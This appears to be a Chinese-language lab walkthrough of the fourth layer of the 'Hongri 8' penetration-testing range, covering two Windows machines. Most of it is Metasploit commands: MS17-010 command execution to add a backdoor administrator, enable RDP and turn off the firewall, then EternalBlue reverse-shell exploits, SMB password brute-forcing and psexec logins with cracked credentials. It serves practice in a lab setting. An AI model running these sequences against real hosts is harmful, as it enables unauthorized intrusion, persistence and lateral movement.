红日8第四层（两台）

第四层(DC)  20.11.11.129 +一个nat网卡对外访问的192.168.75.136（前面扫描到这个是windows-server2012）

在第三层过来时记得加上网段然后就可以用nmap扫描发现了 135,445,139等端口，漏洞扫描发现了ms17_010

用模块扫描一下发现了真的有ms17_010

use 0  到use 1 都不行（怀疑有那个防火墙）
use 2可以执行 命令执行

use auxiliary/admin/smb/ms17_010_command 
set rhost 20.11.11.129
set command  net user      （尝试一下看用户）
run

set command net user zgx620 zgx@620  /add   （添加用户）
run  

set  command net localgroup administrators  zgx620  /add  （添加到管理组）
run

set command 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'    (开3389端）

set command netsh advfirewall set allprofiles state off #关闭防火墙  （这个关掉才可以永恒之蓝use 1成功）

use 1
set  rhosts 20.11.11.129
set lhost 192.168.75.131
run(成功)

use 0
set  rhosts 20.11.11.129
set lhost 192.168.75.131
run(成功)

第二种
如果想尝试远程就得去计算机里面把那个只允许同网段的连接关掉，才可以远程
rdesktop    20.11.11.129

第三种用

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 20.11.11.129
set smbuser /roo/Desktop/a.txt
run可以            (可以跑出密码) （用字典去跑，可能会跑很久）

 用smb凭证攻击试试
use exploit/windows/smb/psexec
set smbuser   zgx620
set smbpass  zgx@620
set rhosts 192.168.75.136
set lhost 192.168.75.131         (可以得到权限)这个也是需要那个nat网卡才可以成功（这个是我添加的用命令执行）

第四层第二台pc 20.11.11.131+nat外网192.168.75.138

用那个fscan扫描发现这个是windows 8.1  x86 32位 开放135，139，445端口
可以尝试永恒之蓝 ，kerberos域渗透
后面用nmap ,跟永恒之蓝模块扫描发现有ms17_010的漏洞
使用 use0，use1，use2都不行

尝试域渗透kerberos 发现可以生成高凭证可以注入但是有一个问题那个20.11.11.129（DC执行但是20.11.11.131不行）

最后用那个smb凭证尝试

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt   (这个用字典跑，一般管理员都是对应的adminstrator所以猜测)
set rhosts 20.11.11.131
set smbuser adminstrator
run可以 
（账号密码是 administrator    admin@123） 

 
use exploit/windows/smb/psexec
set smbuser   administrator
set smbpass  admin@123
set rhosts 20.11.11.131
set lhost 192.168.75.131
set SMB::AlwaysEncrypt false    
set SMB::ProtocolVersion 1
（因为这个是32位的所以不能加上x64） 可以得到权限

(这两个是针对Exploit failed [disconnected]: RubySMB::Error::EncryptionError Communication error with the remote host: An error occurred reading from the Socket Connection reset by peer. The server supports encryption but was not able to handle the encrypted request.)那两个smb

（注意这台有问题需要把防火墙关掉否则ping不通但是又是黑盒测试不知道密码，用那个刷机软件去刷一下可以自己设置密码在桌面上面）

这个是刷机的东西针对windows